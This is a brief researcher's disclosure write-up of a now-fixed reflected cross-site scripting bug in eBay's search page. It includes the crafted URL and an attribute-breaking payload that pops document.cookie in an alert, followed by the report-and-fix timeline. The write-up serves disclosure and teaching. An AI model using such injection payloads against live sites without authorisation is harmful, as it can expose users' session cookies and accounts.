The first place where I started looking for a JavaScript code injection on ebay.com was a search box. Surprisingly, it was a bull’s eye.
I typed “Gold” and hit “Search” button. I was redirected to:
http://www.ebay.com/sch/i.html?_trksid=m570.l1313&_nkw=gold&_sacat=0&_from=R40
Then I looked in the source code. It seemed that every checkbox (e.g. “Auction“, “Buy It Now” and so on) had a dynamically generated URL:
<a href="http://www.ebay.com/sch/i.html?_from=R40&_sacat=0&_nkw=gold&rt=nc&LH_Auction=1">
What I had found interesting was a part after the search query (“gold“) which was absent in the webbrowser’s address bar:
&rt=nc&LH_Auction=1
So I simply tried to abuse it with a value of:
" onclick=alert(document.cookie) x="
In the address bar of my webbrowser I typed:
http://www.ebay.com/sch/i.html?_from=R40&_sacat=0&_nkw=gold&rt=" onclick=alert(document.cookie) x="
After clicking “Auction” or “Buy it Now” checkbox my cookies showed up in an alert box.
Voilà!
This got me listed on ebay’s Security Researcher’s Acknowledgment page.
Bug’s lifespan:
[January 23rd 2013] - first report [March 5th 2013] - second report after no response [April 2nd 2013] - bug fixed